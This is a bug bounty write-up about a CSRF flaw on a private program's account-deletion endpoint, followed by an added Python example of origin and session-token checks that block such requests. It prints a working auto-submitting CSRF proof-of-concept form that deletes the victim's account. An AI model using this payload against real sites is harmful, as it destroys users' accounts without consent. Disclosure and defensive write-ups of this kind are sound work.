In the name of Allah, I begin.
Hi. I am Orin from Bangladesh. I am a medical student. For the last couple of months I have been trying to get at least one of my bugs triaged, but all I have been getting is duplicates. But finally one of my bugs got triaged. Here I'm gonna explain how I exploited it.
Recently I got invited into a private program. Normally I look at every button or feature of a website and poke around a little bit to see how that function works and how I can manipulate it. In there, most of the features used a CSRF token except the delete button, and no confirmation mail was sent to verify it.
So I quickly generated a CSRF payload (using Burp) and tried it on my second account. And BOoM! It got executed. I was successfully able to delete the second account through CSRF. Here is my payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.[REDACTED].com/$victim_username/main/send_delete_request" method="POST">
<input type="hidden" name="message" value="Bug Hunting Test 1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
It got triaged as medium severity and I got 7 points for it.
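A server-side gate that would reject the auto-submitted form above, as an added example that is not part of the original post or the program's own code. The secret key, trusted origin, session id and the `csrf_token` field name are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions (not from the post): per-deployment secret and the site's origin.
SECRET_KEY = secrets.token_bytes(32)
TRUSTED_ORIGIN = "https://www.example.test"  # placeholder for the redacted site


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session: HMAC(secret, session_id), embedded in the form."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Accept only requests whose Origin (or Referer fallback) is our own site."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # state-changing request with no provenance: reject
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_delete_request(session_id: str, headers: dict, form: dict) -> bool:
    """Gate for the account-deletion POST: origin check plus session-bound token."""
    if not same_origin(headers):
        return False
    supplied = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    # Constant-time comparison so the check does not leak token prefixes.
    return hmac.compare_digest(supplied.encode(), expected.encode())


if __name__ == "__main__":
    # Constructed requests: the cross-site auto-submit vs. the site's own form.
    session = "constructed-session-id"
    forged = allow_delete_request(
        session, {"Origin": "https://attacker.example"},
        {"message": "Bug Hunting Test 1"})
    legit = allow_delete_request(
        session, {"Origin": TRUSTED_ORIGIN},
        {"message": "Bug Hunting Test 1", "csrf_token": issue_csrf_token(session)})
    print("forged allowed:", forged, "| legitimate allowed:", legit)
```

The same gate belongs on every state-changing endpoint, and a confirmation mail before deletion adds a second barrier if the token check is ever missed on one route.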